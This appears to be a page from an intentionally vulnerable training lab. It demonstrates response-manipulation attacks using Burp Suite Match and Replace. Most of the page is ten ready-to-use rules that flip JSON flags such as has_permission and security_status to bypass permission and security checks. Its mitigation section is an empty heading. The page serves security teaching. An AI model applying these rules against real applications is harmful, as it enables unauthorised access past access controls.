Lab 17: Advanced Response Manipulation

Advanced response manipulation via response manipulation vulnerabilities

Difficulty: Expert

Lab Overview

This lab demonstrates advanced response manipulation vulnerabilities where attackers can use Burp Suite to modify complex responses and bypass multiple security controls.

Objective: Understand how advanced response manipulation attacks work and how to exploit them using Burp Suite.

Advanced Response System
Check Advanced

Test advanced features with response manipulation:

Check Security

Test security levels with response manipulation:

Check Permissions

Test permissions with response manipulation:

Advanced Response Manipulation Tester
⚠️ Advanced Response Manipulation Warning

This lab demonstrates advanced response manipulation vulnerabilities:

  • Advanced Bypass - Bypass advanced features
  • Security Bypass - Bypass security controls
  • Permission Bypass - Bypass permission checks
  • Multi-Layer Bypass - Bypass multiple controls
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "is_advanced":false"is_advanced":true
  • "security_valid":false"security_valid":true
  • "has_permission":false"has_permission":true
  • "access_level":"basic""access_level":"advanced"
Advanced Response Manipulation Rules
Advanced Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"is_advanced\":false", "string_replace": "\"is_advanced\":true" }
Security Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"security_valid\":false", "string_replace": "\"security_valid\":true" }
Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_permission\":false", "string_replace": "\"has_permission\":true" }
Access Level Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"access_level\":\"basic\"", "string_replace": "\"access_level\":\"advanced\"" }
Security Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"security_status\":\"failed\"", "string_replace": "\"security_status\":\"passed\"" }
Permission Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_status\":\"denied\"", "string_replace": "\"permission_status\":\"granted\"" }
Vulnerability Details
  • Type: Advanced Response Manipulation
  • Severity: Critical
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of complex responses
Attack Vectors
  • Advanced Bypass: Bypass advanced features
  • Security Bypass: Bypass security controls
  • Permission Bypass: Bypass permission checks
  • Multi-Layer Bypass: Bypass multiple controls
Advanced Response Manipulation Examples

Use these Burp Suite Match and Replace rules to exploit advanced response manipulation vulnerabilities:

1. Advanced Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"is_advanced\":false", "string_replace": "\"is_advanced\":true" } // This rule bypasses advanced features // Example: "is_advanced":false becomes "is_advanced":true
2. Security Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"security_valid\":false", "string_replace": "\"security_valid\":true" } // This rule bypasses security controls // Example: "security_valid":false becomes "security_valid":true
3. Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_permission\":false", "string_replace": "\"has_permission\":true" } // This rule bypasses permission checks // Example: "has_permission":false becomes "has_permission":true
4. Access Level Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"access_level\":\"basic\"", "string_replace": "\"access_level\":\"advanced\"" } // This rule bypasses access level // Example: "access_level":"basic" becomes "access_level":"advanced"
5. Security Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"security_status\":\"failed\"", "string_replace": "\"security_status\":\"passed\"" } // This rule bypasses security status // Example: "security_status":"failed" becomes "security_status":"passed"
6. Permission Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_status\":\"denied\"", "string_replace": "\"permission_status\":\"granted\"" } // This rule bypasses permission status // Example: "permission_status":"denied" becomes "permission_status":"granted"
7. Advanced Enabled Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"advanced_enabled\":false", "string_replace": "\"advanced_enabled\":true" } // This rule bypasses advanced enabled // Example: "advanced_enabled":false becomes "advanced_enabled":true
8. Security Passed Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"security_passed\":false", "string_replace": "\"security_passed\":true" } // This rule bypasses security passed // Example: "security_passed":false becomes "security_passed":true
9. Permission Granted Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_granted\":false", "string_replace": "\"permission_granted\":true" } // This rule bypasses permission granted // Example: "permission_granted":false becomes "permission_granted":true
10. Feature Enabled Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"feature_enabled\":false", "string_replace": "\"feature_enabled\":true" } // This rule bypasses feature enabled // Example: "feature_enabled":false becomes "feature_enabled":true
Real-World Attack Scenarios
Mitigation Strategies